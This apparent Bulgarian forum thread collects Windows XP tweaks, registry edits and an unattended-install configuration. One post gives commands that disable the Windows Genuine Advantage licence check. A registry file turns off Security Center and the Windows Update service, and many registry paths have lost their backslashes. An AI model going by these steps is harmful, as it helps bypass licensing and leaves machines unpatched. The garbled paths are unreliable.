Случвало ми се е понякога да си пусна монитора на по-голяма честота, отколкото поддържа и след това да не мога да върна старото състояние и съответно да не виждам нищо, освен един черен екран. Имам в предвид случаите когато вместо бутона Aply натисна ОК и не ми се появява онзи прозорец който ме пита дали искам да запазя промените така или след 15 секунди ще ми възстанови оригиналните настройки. Та в такава ситуация варианта е да се рестартира компютъра, да се влезе под Safe Mode и да се оправи така монитора. Да, ама има по-лесен начин wink.gif

1. натиснете няколко пъти клавиша Esc (това ще затвори всички прозорци, които не могат да се минимизират - да, има такива прозорци)
2. натиснете клавишната комбинация Win+M, която ще минимизира всички прозорци (Win+D върши същата работа)
3. преместете мишката така, че да отидете в някой от горните два ъгъла на монитора (лесно е, просто движете нагоре и надясно/наляво известно време). Така като чукнете с десен бутон, ще се сигурни, че не сте върху някоя икона.
4. натиснете десния бутон на мишката
5. натиснете буквата R
6. натиснете клавишите Ctrl+Shift+Tab
7. натиснете клавишите Alt+v (може да натиснете 6 пъти клавиша Tab, ако сте в режим на писане на кирилица)
8. натиснете клавишите Ctrl+Tab 2 пъти
9. натиснете клавиша Tab 2 пъти
10. натиснете поне два пъти стрелката нагоре
11. натиснете клавиша Enter (може да натиснете два пъти клавиша Tab и след това Enter)

Еми това е, би трябвало всичко да се оправи. Този трик съм го намерил собственоръчно и всъщност не е никакъв трик, а просто клавишни комбинации, които водят до желания резултат - намаляването на херците на дисплея.
Другия вариант е просто да намалите разделителната способност, като последователността е същата до стъпка 6, а при стъпка 7 натиснете два пъти клавиша Tab, после стрелката наляво няколко пъти и след това клавиша Enter (може да натиснете клавиша Tab 5 пъти и след това Enter).


Как да задам на Internet Explorer да помни потребителските имена и паролите, с които влизам в различни сайтове
Стартирате Internet Explorer и отивате върху Tools -> Internet Options -> таба Content -> бутона AutoComplete... и след като го чукнете в новопоявилия се прозорец сложете отметката пред User names and passwords on forms. По този начин след като веднъж напишете потребителско име и парола за даден сайт (например поща), то ще се запамети автоматично в база данни и при следващо влизане в този сайт ако напишете само първата буква на потребителското ви име ще се отвори допълнително прозорце, от което можете да си изберете пълното потребителско име и след това автоматично ще бъде въведена паролата ви. Ако искате всеки път да бъдете питани дали Internet Explorer да запаметява потребителското име и паролата ви за даден сайт, просто поставете отметка пред Prompt me to save passwords.
Не ви препоръчвам обаче да използвате тази опция, защото така при евентуално проникване във вашия компютър, някой може да получи достъп до всичките ви пароли, които са запаметени за определени сайтове.

Други опции, които можете да настроите в гореспоменатия прозорец са за автоматичното изписване на уеб адреси и полета във форми. Това става чрез поставянето на отметки пред следните опции:
- Web addresses - когато пишете някой уеб адрес, ако вече сте го въвеждали преди това, под полето, в което пишете, ще ви се изведе списък със всички адреси, започващи с буквите или цифрите, които сте написали досега.
- Forms - подобно на горната опция, само че това важи за онлайн форми, които попълвате. Между другото тази опция е свързана с гореописаната опция по запаметяване на потребителските пароли. Иначе е много полезна когато попълвате множество форми (например регистрация за поща, форум или някой сайт).


Как да спрем съобщението за Low Disk Space
Сигурно много пъти ви е дразнило това съобщение, което ви изскача, въпреки че знаете с колко свободно място разполагате. Ето един начин да го премахнете без да използвате специална програма:

Чукнете "Start" бутона, след това изберете "Run..." и там напишете "regedit". В Regedit отидете следвайте следните стъпки: HKEY CURRENT USER -> Software -> Microsoft -> Windows -> CurrentVersion -> Policies -> Explorer. В дясната страна на прозореца потърсете за елемент наречен NoLowDiskSpaceChecks. Ако съществува такъв елемент то сигурно стойността срещу него в колоната Data е 0x00000000 (0). Това означава, че съобщението за Low Disk Space ще ви се показва. За да преустановите това, чукнете два пъти върху името на елемента и в текстовото поле, където пише "0" поставете "1".
Ако случайно този елемент не съществува, тогава чукнете с десен бутон на мишката в дясната част на прозореца под другите елементи и изберете New -> DWORD value. Задайте името на елемента да бъде NoLowDiskSpaceChecks (точно както се пише, без интервалите) и след това натиснете Enter. После чукнете два пъти с мишката върху името на елемента и задайте стойността му да бъде "1" (както беше описано по-горе).
Резултатът от това, което направихте трябва да изглежда така:Ако искате да видите информация за системата си ето един полезен трик
Натиснете бутона "Старт", след това изберете Run.. (това също става като натиснете бутона Win+R). В диалоговият прозорец напишете dxdiag. Тази команда ще ви стартира програмата за диагностика на DirectX, която освен всичко дава доста полезна информация за вашата система. Разгледайте отделните страници, в които ще намерите информация за процесора си, РАМ паметта, видео картата, звуковата карта и много други неща.

 

ДРУГИ СЪВЕТИ И ТРИКОВЕ

 

Q:Как може да се направи Windows XP да стартира автоматично с User и парола(БЕЗ ПАРОЛА- няма значение)
A:Start>Run>control userpasswords2.В последвалото меню


OTмаркираме >Users must enter a user name and password to use this
computer

Даваме Apply и задаваме кой User с коя парола да стартира.
____________________________________________________________

Q:Компютъра ми забива когато отварям папки с Video или Image файлове.Може да дава и грешка.
A:Понякога се получава така че Preview функцията в Windows-a се скапва и не може да направи thumb файл на файловете в папката
Решението е

Start>run>CMD
regsvr32 /u shmedia.dll //премахва Preview функцията на video файлове
//обикновенно решава проблема

regsvr32 /u shimgvw.dll //премахва Preview функцията на image
файлове

За връщане на функцийте
regsvr32 shmedia.dll
regsvr32 shimgvw.dll
____________________________________________________________

Q:Kaк се деинсталира MSN-а
А:Най лесния начин
Start>run

Код

RunDll32 advpack.dll,LaunchINFSection %windir%infmsmsgs.inf,BLC.Remove


____________________________________________________________


Q:От както качих и преисталирах -Nero,Daemon tool и подобни
CD рома ми го няма в My computer

А:

Код

1.Проверка на кабелите при изключен компютър

2.Проверка на състоянието в BIOS-a

3.Проверка със системна дискетана Windows 98/Me под DOS.

4.Ако горните 3 работят и разполагате с Windows Xp проверете в
Control panel>System>Hardware>Device manager>DVD/CD-rom drives
Aко устрoйството e инсталирано значи се е развалил добрият стар Windows.
oбикновенно при инсталирането на допълнителен софтуер управляващ
устройствата се получава така.

(nero,roxio...),


Отваряте регистрито:

start>run>regedit
Намирате следния ключ
[code]
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlClass{4D
36E965-E325-11CE-BFC1-08002BE10318}]

и изтривате UPPERFILTERS и LOWERFILTERS

Рестартирате и би трябвало да сте готови


____________________________________________________________
Q:Kaк се сменя Defaul Port-a на Remote Desktop сървъра
А:Трябва да се бръкне в регистрито
Ключа се намира тук

Код

HKEY_LOCAL_MACHINESystemCurrentControlSetControlTerminalServ
erWinStationsRDP-TcpPortNumber____________________________________________________________
Q:Как се вижда IP adress-a на моя компютър даден ми от доставчика или зададен ми ръчно на платката
А:start>run>CMD>ipconfig /all
____________________________________________________________

Q:Kaк се сменя IP adress-a на мрежовата карта
А:Control panel>Network connections>local area connections>десен бутон с мишката Properties>В general tab-a >Internet protocol(ТCP/IP)
____________________________________________________________
Q:Как се сменя MAC адреса на мрежовата карта
A:Може с програма може и от Windows-a aко драйвера на платката го
позволява.Програмата по принцип е SMAC а иначе MAC-а чрез Windows-a се сменя от :
Control panel>Network connections>Local area connection (вашия
адаптер)>Десен бутон с мишката Properties>В general tab даваме
>Configure>Advanced>

Taм трябва да има "network address" поле в което можете да сменяте адреса на платката.Ако не съществува такова поле то трябва или през регистрито да сменяте мак-а или чрез програмата SMAC
Смяна през регистъра -Добавено от blackjakan
http://www.nthelp.com/NT6/change_mac_w2k.htm


____________________________________________________________

Q:Kaк да променя буквата на не системен диск или CD-rom
A:Control panel>administrative tools>Computer managment>Storage>Disk managment>избираме партитишън или CD-rom устройство>Даваме десен бутон с мишката>Change Driver letter and paths

 Снимката е намалена: 74% от оригиналните [ 686 x 518 ]____________________________________________________________
Q:Kaк мога да променя програмите които се стартират автоматично с Windows-a
A:Има два начин.
Първи начин:start>run>msconfig>startup

 Снимката е намалена: 89% от оригиналните [ 575 x 385 ]


Втори начин:
Програмите които се стартират се намират в следните ключове в регистрито

Код

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
Run]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
RunOnce]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
RunServices]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
RunServicesOnce]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonUserinit]
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionR
un]
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionR
unOnce]
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionR
unServices]
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionR
unServicesOnce]
[HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows]____________________________________________________________

Q:излиза ми съобщение 'Virtual memory too low'
A:Проблема е че PageFile-a е много малък.Решението е
control panel>system>Advanced>Performance>Settings>Advanced>Change>

променяте стойността както решите и давате Set
Обикновенно паметта е равна на 1.5хRAM

____________________________________________________________
Q:Иконите на десктопа са ми със сянка отдолу и загрозяват Desktop-a
A:Control panel>system>advanced>performance>Settings>намерете 'Use drop shadows for icon labes on desktop'
UPDATE:
Control panel>Dislpay>Desktop>Customize desktop>WEB
Всичко трябва да е отмаркирано


____________________________________________________________
Q:Скапал ми се е Windows Firewall-a и дава грешки
А проблемът е много комплексен но следната команда може да помогне
Start>run>

Код

rundll32 setupapi,InstallHinfSection Ndi-Steelhead 132 %windir%infnetrass.inf


____________________________________________________________

Q:Как да мина от файлова система FAT32 към NTFS
A:Има много начини,с 3rd party програми като Partition Magic или с вградения конвертор в Windows-a

Решили сме кой дял да конвертираме вече D:(Games) (пише го в My Computer)Games oзначава как се казва дяла
start>run>cmd
convert d: /fs:NTFS


КодD:>convert d: /fs:ntfs
The type of the file system is FAT32.
Enter current volume label for drive D: GAMESТук пишем името на дяла !Натискаме Enter и процеса продължава до неговото завършване.Може да се наложи рестарт.
Обратния вариант е само с 3rd party програми и от Windows нестава.Препоръчително е да минете към NTFS файлова система
Процедурата е напълно безопасна но веднъж тръгне ли
не пипайте компютъра до момента в който процеса не завърши сам !!!
Може да отнеме известно време -минимум 5 мин максимум няколко часа


____________________________________________________________
Q:Много бавно Browse-вам компютрите в локалната мрежа
A:Проблемът идва от там че Windows-a търси Scheduled tasks които обикновенно няма да намери.
Решението е да се изтрие ключ от регистрито
start>run>regedit


Код

HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace


Трием

Код

{D6277990-4C6A-11CF-8D87-00AA0060F5BF}


За да се оттървем от търсенето на Scheduled tasks

Ако решим че не ни трябва да търси принтери автоматично в локалната мрежа то трием и

Код

{2227A280-3AEA-1069-A2DE-08002B30309D}


!!!Модифицирането на регистрито е на ваша отговорност.Винаги правете BACKUP!!!
____________________________________________________________

Force Explorer to Start With the Folder You Want

Intended For
Windows XP
Windows 2000
Windows Me
Windows 98
Windows 95
Few things in Windows are more irritating than the way that Explorer always opens in the same folder (C: for Windows 95/98, My Documents for Windows Me/2000/XP). If you have an entry in your Start Menu to run Explorer, you can change it to "Explore" at the folder of your choice:

* Open Explorer, and go to your Start Menu folder.
* Find the shortcut for Explorer, right click on it, and select Properties.
* Click on the Shortcut tab, and change the Target so it reads: c:windowsEXPLORER.EXE /n, /e, d:myfolder (where c:windows is your Windows directory, and d:myfolder is the directory in which you want Explorer to start.)

* Tip: To have Explorer start with My Computer, so no branches are initially expanded, use the following command line options: /n, /e, /select, c:

Note: this won't work if you try to start Explorer by right-clicking on the Start Menu . Just put a shortcut to EXPLORER.EXE in the top level of your Start Menu folder for easy access.


Преди време помня на някой му трябваше това, нека да го има.

____________________________________________________________

Q:Как се изключва Autorun опцията на CD-ROM устройство
Start->Run->regedit+Enter
HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Services>Cdrom>
Щракаме 2 пъти върху autorun и променяме value data от 1 на 0 -> OK + Рестарт.


____________________________________________________________

Q:Как да махнем Low Disk space
Отидете в регистъра run>REGEDIT.EXE, отивате при key
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolic
iesExplorer
и ако DWORD го няма добавете DWORD след което в пишете "NoLowDiskSpaceChecks" и сменяте стойността на 1.

____________________________________________________________

Q:как да направим интернет връзката по-бърза?
да увеличим пропускателната способност на интернет връзката


A:Windows XP резервира за свои нужди 20% от всяка интернет връзка. Този размер може да бъде намален до 0% чрез стартиране на 'gpedit.msc' от RUN. Там намерете разклонението Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler – и там кликнете два пъти върху 'Limit reservable bandwidth', намиращ се отдясно и му задайте стойност ENABLED, а за Bandwidth Limit – 0%
Edit:[b]cougarПояснение Clarification about the use of QoS in end computers that are running Windows XP

____________________________________________________________

Q:Как да добавим Device Manager на дясно копче на My Computer
Създаваме файл с Notepad и го запазваме с разширение .reg


Код

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellDevices]
@=hex(2):44,00,65,00,76,00,69,00,63,00,65,00,20,00,4d,00,61,00,6e
,00,61,00,67, 00,65,00,72,00,00,00
"SuppressionPolicy"=dword:4000003c
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellDevicescommand]
@=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73
,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6d,00,6d
,
00,63,00,2e,00,65,00,78,00,65,00,20,00,2f,00,73,00,20,00,25,
0
0,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,0
0
,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00
,
5c,00,64,00,65,00,76,00,6d,00,67,00,6d,00,74,00,2e,00,6d,00,
7
3,00,63, 00,20,00,2f,00,73,00,00,00

[/quote]

____________________________________________________________

Ето един .reg файл, с който за секунди можете да си преименувате кошчето или т.нар. Recycle Bin : Rename_Recycle_Bin.reg

За тези, които предпочитат да имат икони без име:

Вместо име, задръжте Alt + 0160 за да въведете празен знак вместо име. Може да се използва само по 1 икона от всеки вид (shortcut, folder, exe, txt, jpg и т.н.)
За следващата икона, повторете: alt+0160 alt+0160
За третата икона, 3 пъти: alt+0160 alt+0160 alt+0160
и т.н.
____________________________________________________________
Добавено от Yewer
Създайте файл Binopt.reg с Notepad, внимавайки да не получи default-ско разширение .txt и копирайте в него следният модифициращ регистрите скрипт

Код

REGEDIT4

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerAdvancedFolderRecycleBinOnDesktop]
"RegPath"="SoftwareMicrosoftWindowsCurrentVersionExplorerHideDeskto
pIconsNewStartPanel"
"Text"="Show Recycle Bin icon on the desktop"
"Type"="checkbox"
"ValueName"="{645FF040-5081-101B-9F08-00AA002F954E}"
"CheckedValue"=dword:00000000
"UncheckedValue"=dword:00000001
"DefaultValue"=dword:00000001
"HKeyRoot"=dword:80000001Съхранете, затворете, кликнете, за да позволите интегриране в регистрите и резултатът ще бъде нова опция в Folder Options. (Последното се намира в Control Panel, Tools на експлорера. В Folder Options таб View, поле Advanced Settings вече има ред "Show Recycle Bin On The Desktop" с checkbox пред него.
Много елегантно е, смятам!
Автор Jerry Honeycutt.

____________________________________________________________
Добавено от -johni

Как да се отваря Мy Computer, a не My Documents, когато стартирате Windows Explorer:
В/у иконката десен бутон->Properties и в прозореца срещу Target поставете изцяло следното:
%SystemRoot%explorer.exe /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}[/quote]

Друг начин за премахване на Genuine Advantage съобщението в
Windows XP

Преинемуваме следните файлове чрез командния прозорец
Командите са следните

Код

Rename %systemroot%system32WgaLogon.dll %systemroot%system32WgaLogon.oldКод

Rename %systemroot%system32WgaTray.exe to %systemroot%system32WgaTray.old


После изтриваме регистрацията на DLL файла който ползва

Код

Regsvr32 %systemroot%system32LegitCheckControl.dll /u


Рестартираме.Ако продължава да има проблем
трием регистритата

Код

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNT CurrentVersionWinlogonNotifyWgaLogon

• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionUninstallWgaNotify


Това с триенето не го препоръчвам защото може да омажете нещо!!!


____________________________________________________________
Q:Ако сте пипали правата по NTFS файлова система и искате да върнете default настройките използвайте следната команда

Код

secedit /configure /cfg %windir%repairsecsetup.inf /db secsetup.sdb /verbose


[/quote]
____________________________________________________________
Eто една много полезна програма предоставена ни от Microsoft
Програмата позволява да прегледате в елементарен вид,всичко
което се стартира в Windows-a при неговото зареждане

AUTORUNS


____________________________________________________________
UPDATE 2.06.2007г,
Generic Host Process for Win32 Service
Проблемът се явява или в грешен ъпдейт или друг проблем.Засега
съм открил няколко ъпдейта които отстранявят проблема.Моля ако
случайно ъпдейтите не работят/работят ме уведомете на ЛС за да видим къде точно е разковничето.
Ъпдейтите ги има тук:
http://store1.data.bg/maloumen/generic_host32_fix/
Най добре е обаче пълен ъпдейт на Windows-a
____________________________________________________________
Update 14.09.2007
Q : Microsoft Outlook 2007 не може да отвори атачнатите файлове
Leve1 файлове

А : Сваляте това и стартирате REG файла.Рестартирате Outlook-a и сте готови


____________________________________________________________
1/22/2007
Ето някои от използваните от мен автоматични настройки при инсталация на Window-s ХР SР2. Направил съм си инсталационен диск с тези и още някои добавки.

1. Промени в регистъра (RegTweaks.reg):

Код

Windows Registry Editor Version 5.00;Disable Automatic Restart in the event of a BSOD
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlCrashCon
trol]
"AutoReboot"=dword:00000000
;Speed up shutdown
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl]
"WaitToKillServiceTimeout"="3000"
;Disables Error Reporting, but notifies when errors occur
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReportin
g]
"DoReport"=dword:00000000
;Disable Welcome Screen and uses Classic Logon
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"LogonType"=dword:00000000
;No EULA box pops on first time use
[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsMediaP
layer]
"GroupPrivacyAcceptance"=dword:00000001
;Disable Windows Picture and Fax Viewer
[-HKEY_CLASSES_ROOTSystemFileAssociationsimageShellExContextMe
nuHandlersShellImagePreview]
;Speed up Network Browsing

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExpl
orerRemoteComputerNameSpace{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]
;Lowers the DNS cache timeout for positive responses from 1 day to 12 hours
;and disables the caching of failed DNS lookups

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDnscach
eParameters]
"MaxCacheEntryTtlLimit"=dword:0000a8c0
"MaxNegativeCacheTtl"=dword:00000000
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
policiessystem]
"SynchronousMachineGroupPolicy"=dword:00000000
"SynchronousUserGroupPolicy"=dword:00000000

;Removes the Alexa extension
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerExtensions{c95fe080-8f5d-11d2-a20b-00aa003c157a}]

;Remove Shortcut Arrows
[HKEY_CLASSES_ROOTlnkfile]
"IsShortcut"=-

;Disables Windows Tour bubble popup
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
AppletsTour]
"RunCount"=dword:00000000

;This adds the "Open Command Window Here" on the right click menu for folders
[HKEY_CLASSES_ROOTDirectoryshellcmd]
@="Open Command Window Here"
[HKEY_CLASSES_ROOTDirectoryshellcmdcommand]
@="cmd.exe /k "cd %L""
[HKEY_CLASSES_ROOTDriveshellcmd]
@="Open Command Window Here"
[HKEY_CLASSES_ROOTDriveshellcmdcommand]
@="cmd.exe /k "cd %L"";Allow renaming of Recycle Bin
[HKEY_CLASSES_ROOTCLSID{645FF040-5081-101B-9F08-00AA002F954E}ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000

;Remove WMP Right Click Options (Queue-it-up, etc.)
[-HKEY_CLASSES_ROOTCLSID{CE3FB1D1-02AE-4a5f-A6E9-D9F1B4073E6C}]
[-HKEY_CLASSES_ROOTCLSID{F1B9284F-E9DC-4e68-9D7E-42362A59F0FD}]
[-HKEY_CLASSES_ROOTCLSID{8DD448E6-C188-4aed-AF92-44956194EB1F}]

;Add/Remove Recycle Bin On Desktop
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerAdvancedFolderRecycleBinOnDesktop]
"RegPath"="SoftwareMicrosoftWindowsCurrentVersionExplorerHideDeskto
pIconsNewStartPanel"
"Text"="Show Recycle Bin icon on the desktop"
"Type"="checkbox"
"ValueName"="{645FF040-5081-101B-9F08-00AA002F954E}"
"CheckedValue"=dword:00000000
"UncheckedValue"=dword:00000001
"DefaultValue"=dword:00000001
"HKeyRoot"=dword:80000001


;Recycle bin uses 3% of available space (not 10%)
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerBitBucket]
"Percent"=dword:00000002

;Add User Accounts2 Dialog (Autologon) in Control Panel
[HKEY_CLASSES_ROOTCLSID{98641F47-8C25-4936-BEE4-C2CE1298969D}]
@="User Accounts 2"
"InfoTip"="Starts The Windows 2000 style User Accounts dialog"
[HKEY_CLASSES_ROOTCLSID{98641F47-8C25-4936-BEE4-C2CE1298969D}DefaultIcon]
@="%SystemRoot%System32nusrmgr.cpl,1"
[HKEY_CLASSES_ROOTCLSID{98641F47-8C25-4936-BEE4-C2CE1298969D}Shell]
[HKEY_CLASSES_ROOTCLSID{98641F47-8C25-4936-BEE4-C2CE1298969D}ShellOpen]
[HKEY_CLASSES_ROOTCLSID{98641F47-8C25-4936-BEE4-C2CE1298969D}ShellOpencommand]
@="Control Userpasswords2"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
ExplorerControlPanelNameSpace{98641F47-8C25-4936-BEE4-C2CE1298969D}]
@="Add Userpasswords2 to Control Panel"


;ADDS ADD/REMOVE PROGRAMS TO MY COMPUTER CONTEXT MENU
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellAdd/Remove Programscommand]
@="control appwiz.cpl"

;Disable Remote Registry Service
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteR
egistry]
"Start"=dword:00000004

;Disable Indexing Service
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicescisvc]
"Start"=dword:00000004

;Disable Security Center
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswscsvc]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauser
v]
"Start"=dword:00000004

;Disable WinXP CD Burning
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"allocatedasd"="2"


А тези ги добавям за всички потребители (файл HCDU.reg):


Код

Windows Registry Editor Version 5.00

;Disable the Desktop Cleanup Wizard
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionE
xplorerDesktopCleanupWiz]
"NoRun"=dword:00000001

;Speed up Network Browsing
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionP
oliciesExplorer]
"NoRecentDocsNetHood"=dword:00000001

;Lowers the time the system waits for user processes to end when the user logs off
[HKEY_CURRENT_USERControl PanelDesktop]
"WaitToKillAppTimeout"="3000"

;Lowers the time the system waits for user processes to end after the user clicks the End Task
[HKEY_CURRENT_USERControl PanelDesktop]
"HungAppTimeout"="3000"

;Forces user processes to end automatically when the user logs off or shuts down
[HKEY_CURRENT_USERControl PanelDesktop]
"AutoEndTasks"="1"

;Disables Windows Welcome Screen popup
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionP
oliciesExplorer]
"NoWelcomeScreen"=dword:00000001


;Removes the recent documents from the start menu.
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionP
oliciesExplorer]
"NoRecentDocsMenu"=dword:00000001

;Classic search, full path in title bar and address bar.
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionE
xplorerCabinetState]
"FullPath"=dword:00000001
"FullPathAddress"=dword:00000001
"Use Search Asst"="no"
"Settings"=hex:0c,00,02,00,1b,01,e7,77,60,00,00,00

;Remove "Shortcut to" on shortcuts
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionE
xplorer]
"link"=hex:05,00,00,00

;Enable Status Bar In Explorer
[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]
"StatusBarOther"=dword:00000001

;show file extensions in explorer
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionE
xplorerAdvanced]
"HideFileExt"=dword:00000000

;EDIT .NFO FILES WITH NOTEPAD
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionE
xplorerFileExts.nfo]
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionE
xplorerFileExts.nfoOpenWithList]
"a"="NOTEPAD.EXE"
"MRUList"="a"
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionE
xplorerFileExts.nfoOpenWithProgids]
"nfo_auto_file"=hex(0):

;NoLowDiskSpaceChecks won't check if you are low on diskspace and pop up a balloon telling you.
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionP
oliciesExplorer]
"NoLowDiskSpaceChecks"=dword:00000001

;Change MenuShowDelay (Start Menu load speed)
[HKEY_CURRENT_USERControl PanelDesktop]
"MenuShowDelay"="2"
"HungAppTimeout"="4000"

;Prevents Internet Explorer windows from being reused
[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]
"AllowWindowReuse"=dword:00000000

;Max your Internet Explorer's simultaneous downloads to 4 (default was 2)
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionI
nternet Settings]
"MaxConnectionsPer1_0Server"=dword:00000004
"MaxConnectionsPerServer"=dword:00000004

;Removes Sign up with Passport Wizard when trying to sign in MSN Messenger
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionI
nternet SettingsPassport]
"RegistrationCompleted"=dword:00000001

;No Confirmation on Delete
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionP
oliciesExplorer]
"ConfirmFileDelete"=dword:00000000

;Classic Control Panel
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionP
oliciesExplorer]
"ForceClassicControlPanel"=dword:00000001


;No Shared Documents
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionP
oliciesExplorer]
"NoSharedDocuments"=dword:00000001

;Disable WinXP CD Burning
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionP
oliciesExplorer]
"NoCDBurning"=dword:00000001

;Disable Sticky Keys
[HKEY_CURRENT_USERControl PanelAccessibilityStickyKeys]
"Flags"="506"

;TaskBar Always on Top & Auto Hide & Show Clock...
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionE
xplorerStuckRects2]
"Settings"=hex:28,00,00,00,ff,ff,ff,ff,03,00,00,00,03,00,00,00,3c,00,00
,00,20,00,00,00,fe,ff,ff,ff,e2,02,00,00,02,04,00,00,02,03,00
,
00

;Add Black Pattern
[HKEY_CURRENT_USERControl PanelPatterns]
"Black"="255 255 255 255 255 255 255 255"2. Изпълнявани команди в start.cmd. (Някои от тях са примерни и не могат да бъдат изпълнявани без наличие на съответните файлове.)

Код

CLS
@echo off
TITLE Windows XP SP2 - Unattended Installation
ECHO.
ECHO Over the next few minutes you will see automated installations
ECHO of various sofware applications, windows updates, and registry
ECHO tweaks being implemented.
ECHO.
ECHO Removing Wallpapers, Screensavers...
DEL "%systemroot%*.bmp"
DEL "%systemroot%WebWallpaper*.jpg"
DEL /Q "%systemroot%system32dllcache*.scr"
ECHO.
ECHO Applying Registry Tweaks...
REGEDIT /S %systemdrive%installRegTweaks.reg
ECHO.
ECHO Disabling ZipPreview and VideoPreview...
start /wait regsvr32 /u /s zipfldr.dll
start /wait regsvr32 /u /s shmedia.dll
start /wait RunDll32 advpack.dll,LaunchINFSection %windir%infmsmsgs.inf,BLC.Remove
ECHO.
ECHO Installing Bulgarian Keyboards
RunDll32 advpack.dll,LaunchINFSection %systemdrive%installcyrBgKYBSXP.inf,DefaultInstall,,n
ECHO.
ECHO Deleting Temp Installation Files...
RD /S /Q "%AllUsersProfile%Start MenuProgramsPrintMe Internet Printing"
RD /S /Q "%AllUsersProfile%Start MenuProgramsJava Web Start"
RD /S /Q "%systemdrive%drivers"
RD /S /Q "%systemdrive%install"
DEL "%AllUsersProfile%DesktopJava Web Start.lnk"
EXIT3. А това е файла с настройки (Winnt.sif)

Код

;SetupMgrTag
[Data]
     AutoPartition=0
     MsDosInitiated="0"
     UnattendedInstall="Yes"
[Unattended]
     UnattendMode=ProvideDefault
     OemPreinstall=Yes
     UnattendSwitch="yes"
     FileSystem=*
     TargetPath=*
     OemSkipEula=Yes
     OEMPnPDriversPath=drivers
     DriverSigningPolicy=Ignore
     WaitForReboot="No"
     Repartition=No
[GuiUnattended]
     AdminPassword=*
     EncryptedAdminPassword=NO
     AutoLogon=Yes
     AutoLogonCount=1
     OEMSkipRegional=1
     TimeZone=100
     OemSkipWelcome=1
[UserData]
     ProductID=xxxx-xxxx-xxxx-xxxx-xxxx
     FullName="Admin"
     OrgName=""
     ComputerName=NODEONE
[Display]
     BitsPerPel=16
     Xresolution=1024
     YResolution=768
     Vrefresh=75
[TapiLocation]
     CountryCode=359
     Dialing=Tone
     AreaCode=077
[RegionalSettings]
     LanguageGroup=5,1
     SystemLocale=0402
